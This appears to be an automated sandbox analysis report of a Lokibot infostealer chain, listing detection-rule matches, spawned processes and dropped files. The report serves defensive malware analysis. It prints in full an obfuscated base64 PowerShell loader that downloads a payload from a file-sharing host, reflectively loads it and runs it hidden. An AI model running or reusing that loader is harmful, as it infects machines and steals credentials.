Source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 9.2.powershell.exe.6a69e98.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 9.2.powershell.exe.6a69e98.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 9.2.powershell.exe.6a69e98.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 9.2.powershell.exe.6a69e98.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.powershell.exe.6a69e98.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000009.00000002.1951506450.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000009.00000002.1951506450.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000009.00000002.1951506450.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: powershell.exe PID: 2504, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5820, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: powershell.exe PID: 5820, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: aspnet_compiler.exe PID: 2736, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkcnKydldFN0cmluZycrJygzWkRpbWFnZUJ5dGVzKTszWkRzdGFydEZsJysnYWcgPSBJdWE8PEJBU0U2NF9TVEFSVD4+SXVhOzNaRGVuZEZsYWcgPSBJdWE8PEJBU0U2NF9FTkQ+Pkl1JysnYTszWkRzdGFydEluZGV4ID0gM1pEaW1hZ2UnKydUZXh0LkluZGV4T2YoM1pEc3RhcnRGbGFnKTszWkRlbmRJbmRleCA9IDNaRGltYWdlVGV4dC5JbmRleE9mKDNaRGVuZEZsJysnYWcpOzNaRHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAzWkRlbmRJbmRleCAtZ3QgM1pEc3RhcnRJbmRleDszWkRzdGFydEluZGV4ICs9IDNaRHN0YXJ0RmxhZy5MZW5ndGg7M1pEYmFzZTY0TGVuZ3RoID0gM1onKydEZW5kSW5kZXggLSAzWkRzdGFydEluZGV4JysnOzNaJysnRGJhc2U2JysnNENvbW1hbmQgPSAzWkRpbWFnZVRleHQuU3Vic3RyaW5nKDNaRHN0YXJ0SW5kZXgsIDNaRGInKydhc2U2NExlbmcnKyd0aCk7M1pEYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoM1pEYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHp3diBGb3JFYWNoLU9iamVjdCB7IDNaRF8gJysnfSlbLScrJzEuLi0oM1pEYmFzZTY0Q29tbWFuZC5MZW5ndCcrJ2gpXTszWkRjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDNaRGJhc2U2NFJldmVyc2UnKydkKTszWkRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGUnKydjdGlvbi5Bc3NlbWJseV06OkxvYWQoM1pEY29tbWFuZEJ5dGUnKydzKTszWkR2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZScrJ10uR2V0TWV0aG9kKEl1YVZBSUl1YSk7JysnM1pEdmFpTWV0aG9kLkludm9rZSgzWkRudWxsLCBAKEl1YXR4dC5LTEdPTC8zMy82MzEuMzQyLjMuMjkxLy86cCcrJ3R0aEl1YScrJywgSXVhZCcrJ2VzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdicrJ2Fkb0l1YSwgSXVhYXNwbmV0X2NvbXBpbGVySXVhLCBJdWFkZXNhdGknKyd2YWRvSXVhLCBJdWFkZXNhdGl2YWRvSXVhLEl1JysnYWRlc2F0aXZhZG9JdWEsSXVhZGVzYXRpdmFkb0l1YSxJdWFkZXNhdGl2YWRvSXUnKydhLEl1YWRlc2F0aXZhZG9JdScrJ2EsSXVhZGVzYXRpdmFkb0l1YSxJJysndWExSXVhLEl1YWRlc2F0aXZhZG9JdWEpJysnKTsnKSAgLUNSZXBsYWNlKFtDaEFyXTczK1tDaEFyXTExNytbQ2hBcl05NyksW0NoQXJdMzkgLUNSZXBsYWNlKFtDaEFyXTUxK1tDaEFyXTkwK1tDaEFyXTY4KSxbQ2hBcl0zNi1DUmVwbGFjZSAgKFtDaEFyXTEyMitbQ2hBcl0xMTkrW0NoQXJdMTE4KSxbQ2hBcl0xMjQpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkcnKydldFN0cmluZycrJygzWkRpbWFnZUJ5dGVzKTszWkRzdGFydEZsJysnYWcgPSBJdWE8PEJBU0U2NF9TVEFSVD4+SXVhOzNaRGVuZEZsYWcgPSBJdWE8PEJBU0U2NF9FTkQ+Pkl1JysnYTszWkRzdGFydEluZGV4ID0gM1pEaW1hZ2UnKydUZXh0LkluZGV4T2YoM1pEc3RhcnRGbGFnKTszWkRlbmRJbmRleCA9IDNaRGltYWdlVGV4dC5JbmRleE9mKDNaRGVuZEZsJysnYWcpOzNaRHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAzWkRlbmRJbmRleCAtZ3QgM1pEc3RhcnRJbmRleDszWkRzdGFydEluZGV4ICs9IDNaRHN0YXJ0RmxhZy5MZW5ndGg7M1pEYmFzZTY0TGVuZ3RoID0gM1onKydEZW5kSW5kZXggLSAzWkRzdGFydEluZGV4JysnOzNaJysnRGJhc2U2JysnNENvbW1hbmQgPSAzWkRpbWFnZVRleHQuU3Vic3RyaW5nKDNaRHN0YXJ0SW5kZXgsIDNaRGInKydhc2U2NExlbmcnKyd0aCk7M1pEYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoM1pEYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHp3diBGb3JFYWNoLU9iamVjdCB7IDNaRF8gJysnfSlbLScrJzEuLi0oM1pEYmFzZTY0Q29tbWFuZC5MZW5ndCcrJ2gpXTszWkRjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDNaRGJhc2U2NFJldmVyc2UnKydkKTszWkRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGUnKydjdGlvbi5Bc3NlbWJseV06OkxvYWQoM1pEY29tbWFuZEJ5dGUnKydzKTszWkR2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZScrJ10uR2V0TWV0aG9kKEl1YVZBSUl1YSk7JysnM1pEdmFpTWV0aG9kLkludm9rZSgzWkRudWxsLCBAKEl1YXR4dC5LTEdPTC8zMy82MzEuMzQyLjMuMjkxLy86cCcrJ3R0aEl1YScrJywgSXVhZCcrJ2VzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdicrJ2Fkb0l1YSwgSXVhYXNwbmV0X2NvbXBpbGVySXVhLCBJdWFkZXNhdGknKyd2YWRvSXVhLCBJdWFkZXNhdGl2YWRvSXVhLEl1JysnYWRlc2F0aXZhZG9JdWEsSXVhZGVzYXRpdmFkb0l1YSxJdWFkZXNhdGl2YWRvSXUnKydhLEl1YWRlc2F0aXZhZG9JdScrJ2EsSXVhZGVzYXRpdmFkb0l1YSxJJysndWExSXVhLEl1YWRlc2F0aXZhZG9JdWEpJysnKTsnKSAgLUNSZXBsYWNlKFtDaEFyXTczK1tDaEFyXTExNytbQ2hBcl05NyksW0NoQXJdMzkgLUNSZXBsYWNlKFtDaEFyXTUxK1tDaEFyXTkwK1tDaEFyXTY4KSxbQ2hBcl0zNi1DUmVwbGFjZSAgKFtDaEFyXTEyMitbQ2hBcl0xMTkrW0NoQXJdMTE4KSxbQ2hBcl0xMjQpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0463951E	9_2_0463951E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_0040549C	13_2_0040549C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_004029D4	13_2_004029D4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00405B6F appears 42 times

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: Commandline size = 2022
Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 2422
Source: C:\Windows\SysWOW64\mshta.exe	Process created: Commandline size = 2022	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 2422	Jump to behavior

Source: 9.2.powershell.exe.6a69e98.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 9.2.powershell.exe.6a69e98.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 9.2.powershell.exe.6a69e98.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 9.2.powershell.exe.6a69e98.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 9.2.powershell.exe.6a69e98.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 9.2.powershell.exe.6a69e98.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 9.2.powershell.exe.6a69e98.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 9.2.powershell.exe.6a69e98.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.powershell.exe.6a69e98.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000009.00000002.1951506450.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000009.00000002.1951506450.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000009.00000002.1951506450.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: powershell.exe PID: 2504, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5820, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 5820, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: aspnet_compiler.exe PID: 2736, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.phis.troj.spyw.expl.evad.winHTA@20/23@1/3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 13_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,

13_2_0040650A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 13_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

13_2_0040434D

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks[1].tiff

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6912:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lbbjqvnr.fw2.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswhichcallyoubabygirlwhichgiveuh.vbS"

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta

ReversingLabs: Detection: 21%

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; 